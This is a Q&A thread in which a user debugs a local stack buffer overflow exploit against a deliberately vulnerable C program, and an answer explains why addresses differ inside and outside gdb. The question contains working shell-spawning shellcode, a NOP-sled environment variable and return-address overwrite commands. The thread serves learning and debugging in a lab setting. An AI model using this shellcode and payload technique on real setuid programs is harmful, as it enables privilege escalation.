
I'm currently trying to understand why one of my methods to exploit a buffer overflow in a program is not working. I tried two solutions: the 1st one works but not the second one, whereas the 1st method just adds a bunch of NOPs where the return address points to. The program does not contain any stack protection mechanisms. I'm working on an x86 Debian machine (ASLR off), kernel 2.6.32-5-686, with the following vulnerable code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *arg)
{
    char msg[12];
    strcpy(msg, arg);
}

int main(int argc, char **argv)
{
    if (argc != 2)
    {
        printf("Usage : prog arg\n");
        exit(1);
    }

    vuln(argv[1]);

    return 0;
}

So, this method is working:

  1. EGG will contain 100x NOP and my shellcode

    export EGG=`python2.6 -c 'print "\x90"*100 + "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`
    
  2. EGG env variable found at: 0xbffffe10 using "x/200s $esp" in gdb

  3. Exploiting the program with:

    ./a.out `python2.6 -c 'print "\x90"*24 + "\x50\xfe\xff\xbf"'`

    where I added 0x40 to the EGG address to let EIP point into the NOP heap.

And this one is NOT working:

  1. export EGG=`python2.6 -c 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`
    
  2. EGG env variable found at: 0xbffffe75 using "x/200s $esp" in gdb

  3. Exploiting the program with:

    ./a.out `python2.6 -c 'print "\x90"*24 + "\x79\xfe\xff\xbf"'`

    where I added 0x4 to the EGG address to skip the part starting at "EGG=".

Here the shell spawns inside gdb, but I'm not suid as I would like to be, and outside gdb the program just segfaults... While using, inside gdb:

r `python2.6 -c 'print "\x90"*24 + "AABC"'`

I get what I was supposed to get:

Cannot access memory at address 0x43424141
0x43424141 in ?? ()

So I was in fact erasing the right return address... What did I do wrong? Why does gdb spawn a shell while nothing works outside the debugger?

  • I'm not sure that exactly 12 bytes are allocated for msg. It may very well be 16 bytes or some other power of two. Commented Aug 3, 2013 at 16:26
  • Use the gdb debugger to understand what actual addresses are involved. I suspect your overflow goes towards upper call frames (that of main or even its caller from crt0.o)... Commented Aug 3, 2013 at 16:28

1 Answer

The environment provided by gdb is different from when you launch from the shell. You need to adjust your addresses.

For example (with ASLR off):

$ cat test.c
#include <stdio.h>
#include <stdlib.h>   /* getenv() */

int main(void)
{
    int i;            /* a local, so &i is an address on the stack */
    printf("stack var at: %p\n", (void *)&i);
    printf("env var at: %p\n", (void *)getenv("PATH"));
    return 0;
}

Gives:

$./test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffebd

$ gdb test
Reading symbols from /home/user/test...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user/test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffe91

Compare, for example, the results of "show environment" in gdb and "printenv" in the shell.
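As an added illustration of the answer's point (this is not the answer's own code), the program below lists where argv[0] and every environment string sit in the process, so the same binary can be run once from the shell and once under gdb and the two listings compared. env_value() also shows the "NAME=" skip the question applies to EGG; sample_env is a constructed self-check input, not a real process environment.

```c
/* Added example: map the process's argv[0] and environment strings so a
 * shell run and a gdb run of the same binary can be compared line by line.
 * Build with the target's usual flags (-m32 on the 32-bit box above). */
#include <stdio.h>
#include <string.h>

extern char **environ;  /* the process environment, as laid out by execve */

/* Return a pointer to the value of NAME in envp, i.e. just past the "NAME="
 * prefix (the same +4 the question applies to "EGG="), or NULL if absent. */
const char *env_value(char *const envp[], const char *name)
{
    size_t n = strlen(name);
    for (int i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    return NULL;
}

/* Total bytes occupied by the environment strings, NUL terminators included.
 * Every variable a debugger or shell adds (gdb typically sets LINES and
 * COLUMNS) grows this number and shifts the strings below it on the stack. */
size_t env_total_bytes(char *const envp[])
{
    size_t total = 0;
    for (int i = 0; envp[i] != NULL; i++)
        total += strlen(envp[i]) + 1;
    return total;
}

/* Constructed sample environment, used only for the self-check below. */
static char *const sample_env[] = { "PATH=/usr/bin", "EGG=AAAA", NULL };

int main(int argc, char **argv)
{
    (void)argc;
    printf("%p argv[0]=%s\n", (void *)argv[0], argv[0]);
    for (int i = 0; environ[i] != NULL; i++) {
        char *eq = strchr(environ[i], '=');
        int namelen = eq ? (int)(eq - environ[i]) : (int)strlen(environ[i]);
        printf("%p %.*s\n", (void *)environ[i], namelen, environ[i]);
    }
    printf("environment strings: %zu bytes\n", env_total_bytes(environ));
    /* Self-check on the constructed sample: the value of EGG starts 4 bytes in. */
    if (env_value(sample_env, "EGG") != sample_env[1] + 4)
        return 1;
    return 0;
}
```

Run it as ./envmap and again under gdb, then diff the two listings: the extra variables and the longer argv[0] account for the different addresses.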


1 Comment

Doesn't the address change only when ASLR is on? Why would the address be different inside and outside of gdb?
